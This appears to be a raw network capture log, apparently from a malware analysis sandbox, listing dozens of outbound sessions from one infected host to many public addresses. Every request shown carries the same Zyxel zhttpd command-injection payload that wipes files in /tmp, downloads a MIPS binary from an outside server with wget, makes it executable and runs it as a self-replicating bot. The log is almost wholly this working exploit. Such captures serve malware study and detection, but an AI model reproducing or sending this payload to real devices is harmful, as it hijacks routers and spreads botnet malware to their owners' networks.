                                            Jan 14, 2024 15:50:45.544564009 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6091192.168.2.233371697.205.122.206443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:45.544630051 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6092192.168.2.2333016189.59.229.51443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:45.544645071 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6093192.168.2.2358678149.71.176.71443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:45.544651985 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6094192.168.2.2345208125.144.119.240443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:45.544672966 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6095192.168.2.2343292104.212.194.217443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:45.544706106 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6096192.168.2.234459417.241.174.145443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:45.544763088 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6097192.168.2.233895464.117.131.26443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:45.544795036 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6098192.168.2.235814024.187.25.92443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:45.544821024 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6099192.168.2.235517232.123.70.69443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:45.544842005 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6100192.168.2.2350136111.60.251.49443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:45.544874907 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6101192.168.2.235626023.1.2.102443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:45.544886112 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6102192.168.2.2340206115.54.244.95443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:45.544934034 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6103192.168.2.234164650.155.16.153443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:45.544986010 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6104192.168.2.2333176103.221.217.203443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:45.545001984 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6105192.168.2.2349170155.185.76.233443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:45.545049906 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6106192.168.2.234872676.197.240.192443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:45.545082092 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6107192.168.2.233336618.48.143.192443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:45.545094967 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6108192.168.2.2344098154.126.122.123443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:45.545130968 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6109192.168.2.235334462.147.144.43443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:45.545142889 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6110192.168.2.2334622188.66.208.142443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:45.545177937 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6111192.168.2.235225413.192.237.23443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:45.545212984 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6112192.168.2.235366413.101.29.27443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:45.545222998 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6113192.168.2.235028044.232.205.135443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:45.545249939 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6114192.168.2.234154697.93.108.192443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:45.545283079 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6115192.168.2.233515290.54.240.27443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:45.545311928 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6116192.168.2.2355558160.154.28.194443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:45.545324087 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6117192.168.2.2352630193.179.212.139443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:45.545382977 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6118192.168.2.2343692171.139.200.220443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:45.545412064 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6119192.168.2.235652282.144.180.28443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:45.545425892 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6120192.168.2.2336380191.7.165.43443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:46.567440987 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6121192.168.2.235202294.157.174.201443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:46.567480087 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6122192.168.2.2334852123.164.169.221443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:46.567519903 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6123192.168.2.2336660168.73.3.162443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:46.567558050 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6124192.168.2.2356508131.239.84.193443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:46.567559004 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6125192.168.2.2346406180.242.13.162443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:46.567611933 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6126192.168.2.2349422124.152.141.12443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:46.567636013 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6127192.168.2.2344652160.152.82.8443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:46.567676067 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6128192.168.2.233734298.246.231.150443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:46.567702055 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6129192.168.2.234812635.11.13.217443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:46.567724943 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6130192.168.2.233360232.95.53.77443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:46.567764997 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6131192.168.2.2343836207.173.67.10443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:46.567784071 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6132192.168.2.2357338191.61.132.61443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:46.567837000 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6133192.168.2.2335122126.130.234.20443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:46.567845106 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6134192.168.2.2356130212.204.129.192443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:46.567900896 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6135192.168.2.234108275.180.25.252443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:46.567917109 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6136192.168.2.2351210166.234.53.71443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:46.567960024 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6137192.168.2.2334132201.252.228.203443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:46.567986012 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6138192.168.2.234605878.78.155.73443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:46.568017960 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6139192.168.2.235775084.138.53.42443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:46.568043947 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6140192.168.2.2335686145.41.98.135443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:46.568084002 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6141192.168.2.236018885.47.96.30443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:46.568134069 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6142192.168.2.2334748142.173.240.91443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:46.568166018 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6143192.168.2.2357278189.131.110.215443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:46.568193913 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6144192.168.2.234675042.151.240.21443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:46.568244934 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6145192.168.2.234470232.37.255.122443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:46.568288088 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6146192.168.2.235289441.110.223.89443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:46.568341017 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6147192.168.2.2340860185.168.207.251443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:46.568363905 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6148192.168.2.2346910202.13.22.143443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:46.568387032 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6149192.168.2.2338620194.225.143.163443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:46.568408966 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6150192.168.2.2358426191.114.40.101443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:46.568455935 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6151192.168.2.2349506200.172.182.132443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:46.568474054 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6152192.168.2.2339966168.196.211.132443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:46.568496943 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6153192.168.2.2344320195.250.124.195443
                                            TimestampBytes transferredDirectionData
